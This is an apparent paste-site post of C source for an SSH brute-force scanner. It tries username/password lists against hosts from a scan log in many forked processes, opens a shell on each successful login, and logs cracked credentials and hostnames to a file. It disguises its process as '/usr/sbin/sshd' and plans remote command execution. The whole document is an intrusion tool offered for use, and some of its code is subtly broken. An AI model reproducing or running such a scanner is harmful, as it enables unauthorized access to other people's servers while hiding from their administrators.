If you want more of my pastes visit:  https://randompaste.000webhostapp.com/index.html
--------------------------------------------------------------------------------------
view my last post at:  https://bitbin.it/XyBO4G4t/
--------------------------------------------------------------------------------------

/*
 * by lizard
 *  some code ripped from haitateam's scanner.
 *   for daily jobs :)
 * Put the user/password in "pass.txt" in the format:
 *    user1 pass1
 *    user2 pass2
 *    user3 pass3
 * Cheers.
 * some code ripped from haitateam's scannah
 * - it fakes the proccesss name in ps list
 * - it gets users/password from a list
 * - some bugfixes
 * - optimized
 * TODO:
 *  - fix some bugs
 *  - make it to execute commands on the host it hacks.
 *  thanks go to ncv, for some ideeas for the code.
*/
#include <stdio.h>
#include <arpa/inet.h>
#include <libssh.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#define FAKE "/usr/sbin/sshd" // how do you want it to appear in ps ? :)

int flag,where;
int shell(SSH_SESSION *session){
 struct timeval;
 int err;
 BUFFER *readbuf=buffer_new();
 time_t start;
 CHANNEL *channel;
 channel = open_session_channel(session,1000,1000);
 if(isatty(0)) // Check if we got a tty.
   err=channel_request_pty(channel); // Request a pty.
 err= channel_request_shell(channel); // Request a shell =).
 start=time(0); // start teh timer
 while (channel>open!=0) // if we dont have a channel open..
   {
    usleep(500000); // sleep
    err=channel_poll(channel,0);
    if(err>0){ // do we have a shell ?
    err=channel_read(channel,readbuf,0,0); //read teh buffer in the channel
     }
    else
    {
     if(start+5<time(0))
     {
      return 1;
     }
    }
    }
    return 0;
   }
/* here comes the nice part
 * This function checks auth
 */

 void checkauth(char *user,char *password,char *host) {
  struct hostent *hp;struct in_addr  *myaddr;
  SSH_SESSION *session; // declare some session thingies
  SSH_OPTIONS *options;
  int argc=1;
  char *argv[]={"none"};
  FILE *vulnf,*nolog; // file where we log the shizz
  where++;
  alarm(10);
  options=ssh_getopt(&argc,argv);
  options_set_username(options,user);
  options_set_host(options,host);
  session=ssh_connect(options);
  if(!session) return ;
  if(ssh_userauth_password(session,NULL,password) != SSH_AUTH_SUCCESS) // if no shell, disconnect.
  {
   ssh_disconnect(session);
   return;
  }
  if(shell(session)) // if we got a session, then we printf() it and log it =>
  {
  if(!flag){
   myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
   myaddr->s_addr=inet_addr(host);
   hp = gethostbyaddr((char *) myaddr,4,AF_INET);
   if((hp!=NULL)){
   vulnf=fopen("vuln.txt","a+");
   fprintf(vulnf,"%s:%s %s | %sn",user,password,host,hp->h_name);
   printf("n-> %s:%s %s | %sn",user,password,host,hp->h_name);}
   else{
   vulnf=fopen("vuln.txt","a+");
   fprintf(vulnf,"%s:%s %s | host did not resolven",user,password,host);
   printf("n-> %s:%s %s | host did not resolven",user,password,host);
   }
 //  flag=1;
   fclose(vulnf);
  }
  }
  else{ // if ssh login is denied, printf() && log it
     myaddr=(struct in_addr*)malloc(sizeof(struct in_addr));
     myaddr->s_addr=inet_addr(host);
     hp = gethostbyaddr((char *) myaddr,4,AF_INET);
    nolog=fopen("nobash.txt","a+");
    if((hp!=NULL)){
    fprintf(nolog,"%s %s %s | %sn",user,password,host,hp->h_name);
    printf("nnobash -> %s %s %s | %sn",user,password,host,hp->h_name);}
 else
 {
  fprintf(nolog,"%s %s %s | no hostn",user,password,host);
    printf("nnobash -> %s %s %s | no hostn",user,password,host);}

    fclose(nolog);
  }
 }
 int main(int argc, char **argv)
 {
  FILE *fp,*passf;
  char *c;
  char buff[4096];
  char *a[80196], nutt[4096], *temp, *t, *string;
  malloc(sizeof(a));
  malloc(sizeof(nutt));
  int count = 0, i;
  int numforks,maxf;
  if((passf=fopen("pass.txt","r")) == NULL)
   { // here we scan the pass file for users and passwords.
   printf("FATAL: Cant find pass.txtn");
   return -1;
   }
    while (fgets(nutt,2024,passf))
       {
         while (t = strchr (nutt,'n'))
           *t = '\0';
         temp = strtok (nutt, " ");
         string = strdup (temp);
         a[count++]=string;
          while (temp = strtok (NULL, " "))
           {
               string = strdup (temp);
               a[count++]=string;
           }

              }
  fclose(passf);

  if(argc!=2)
  {
   printf("%s <max forks>n",argv[0]);
   exit(0);
  }
  if((fp=fopen("scan.log","r"))==NULL) exit(printf("FATAL: Cannot open scan.logn"));

  maxf=atoi(argv[1]);

strcpy(argv[0],FAKE);    // fake the proccess name.
  while(fgets(buff,sizeof(buff),fp))
  {
   c=strchr(buff,'n');
   if(c!=NULL) *c='\0';
   if (!(fork()))
   {
   where=0;
//   printf("Trying to pwn %s",buff);
  for (i=0; i<count; i=i+2){
//   printf("* Trying %s:%s %sn",a[i],a[i+1],buff);
      checkauth(a[i],a[i+1],buff); // try to auth
  }
   exit(0);
   }
   else
   {
  numforks++;
  if (numforks > maxf)
  for (numforks; numforks > maxf; numforks--)
  wait(NULL);
   }
  }
 }